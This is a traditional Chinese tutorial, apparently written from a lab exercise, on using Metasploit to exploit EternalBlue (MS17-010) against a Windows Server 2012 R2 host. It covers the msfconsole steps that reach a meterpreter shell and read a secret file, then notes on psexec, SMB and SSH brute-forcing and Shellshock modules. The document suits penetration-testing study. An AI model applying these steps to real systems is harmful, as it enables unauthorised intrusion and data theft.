Metasploit 是一個廣泛用於測試和測試計算機系統安全性的開源測試工具和框架。它提供了一個集成的環境，讓安全專業人員和駭客可以進行漏洞測試、滲透測試和漏洞利用。

下面以「永恆之藍」的漏洞當作攻擊範例：

• 用 nmap 掃描後的結果，發現是 windows server 2012 R2 Datacenter 9600版。 而且根據 smb-security-mode 的特徵好像大部分都存在有 MS17-010 的漏洞。
  

• 來搜尋看看這版本有沒有漏洞
  
  發現有「永恆之藍」的漏洞
  https://www.exploit-db.com/exploits/42030

• msfconsole 為自動化入侵工具，屬於定型化的攻擊工具。
  輸入 msfconsole 啟動 Metasploit 工具
  

• 用 search ms17-010 搜尋永恆之藍的漏洞
  
  exploit 表示攻擊程式
  auxiliary 表示測試程式

  use：告訴 Metasploit 要使用第二個模組或插件。
  use 2 (來試試看，失敗)
  use 4 (可以)
  show options：顯示可設定的選項
  

  rhosts：設定要攻擊的 IP  172.16.30.4
  lhost：設定攻擊後要接收指令的 IP (VPN後的 IP: 192.168.200.6)
  lport：設定攻擊後要接收指令的 port  (避免亂掉)
  run：開始搜尋
  
  出現 meterpreter > 表示攻擊成功

• 搜尋 secret.txt 檔案
  search -f secret.txt

• 找到了！在 c:\Users\Administrator\Documents\Secret.txt。
  cat 指令要將 \ 變成 \ (\ 為跳脫字元)
  可成功查看檔案內容了。
  

• 補充：
  以下是我整理的一些 Metasploit 腳本的使用時機：

  • exploit/windows/smb/psexec 模組
    • 使用時機：利用 Windows 主機上的 SMB 服務（Server Message Block）以達到執行命令或Shell的目的。
    • 使用條件/特徵：
      1. 有開 SMBv1 服務(Port 139、445 有通)
      2. 系統是 Windows Vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2008 R2、Windows Server 2012、Windows Server 2012 R2和Windows Server 2016。
      3. 必需要先得到一組帳號密碼。
  • auxiliary/scanner/smb/smb_login 模組
    • 使用時機：常用於爆破 SMB 服務的帳號密碼。
    • 使用條件/特徵：
      1. Port 139、445 有通
      2. 想透過 SMB 登入來猜密碼。
      3. BRUTEFORCE_SPEED 改 3，比較不容易打掛
  • exploit/multi/http/apache_mod_cgi_bash_env_exec 模組
    • 使用時機：用於利用 Apache HTTP 服務中的 Bash 環境變量代碼注入漏洞（通常稱為 Shellshock 漏洞）。這個漏洞允許攻擊者在受影響的 Apache 服務上執行任意命令，可以 root 權限運行。
    • 使用條件/特徵：
      1. Port 80 有通
      2. 具有 Apache 服務
      3. 有個 cgi-bin 資料夾(表示可能就有 shellshock 弱點)
  • auxiliary/scanner/ssh/ssh_login 模組
    • 使用時機：需要具備目標 SSH 服務的信息、用戶帳戶列表和密碼字典，並確保測試是合法且受授權的。
    • 使用條件/特徵：
      1. 有開 SSH 服務。
      2. Port 22 有通。
      3. 有帳號密碼的字典。
  • 可以安裝 PostgreSQL 方便 msfconsole 使用
    sudo msfdb init
sudo service postgresql start